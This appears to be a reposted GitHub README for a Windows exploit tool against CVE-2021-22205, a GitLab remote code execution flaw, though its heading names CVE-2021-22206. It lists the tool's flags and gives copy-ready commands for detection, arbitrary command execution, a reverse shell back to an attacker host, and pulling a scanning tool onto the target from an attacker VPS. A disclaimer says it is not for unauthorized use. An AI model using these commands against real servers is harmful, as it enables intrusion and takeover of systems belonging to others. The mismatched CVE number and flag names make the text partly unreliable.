CVE-2021-22206
2021-12-18 17:50:10 Author: github.com(查看原文) 阅读量:12 收藏

CVE-2021-22205 RCE 工具仅用于分享交流,切勿用于非授权测试,否则与作者无关

  -R string
        VPS to load tools eg: -R 127.0.0.1:8083
  -T string
        Tool name eg: -T fscan
  -c string
        exec cmd eg: -c "id" (default "id")
  -host string
        reverse shell host
  -m string
        Method for using of CVE-2021-22205 eg:-m detect|rce1|rev|upload (default "detect")
  -port string
        reverse shell port
  -target string
        Target Url (eg: -target https://10.10.10.10) (default "https://10.10.10.10")

实现四个功能

DnsLog探测
-m detect
CVE-2021-22205.exe -target https://10.10.10.10 -m detect

RCE
-m rce1 
rce(Postbin-OOB)
CVE-2021-22205.exe -target https://10.10.10.10 -m rce1 -c whoami

反弹shell
-m rev 
CVE-2021-22205.exe -target https://10.10.10.10 -m rev -host 10.10.10.10 -p 8081

上传文件(http出网-curl,需要VPS)
-m upload 
CVE-2021-22205.exe -target https://10.10.10.10 -m upload  -R 127.0.0.1:8083 -T fscan.exe


文章来源: https://github.com/y35uishere/CVE-2021-22206
如有侵权请联系:admin#unsafe.sh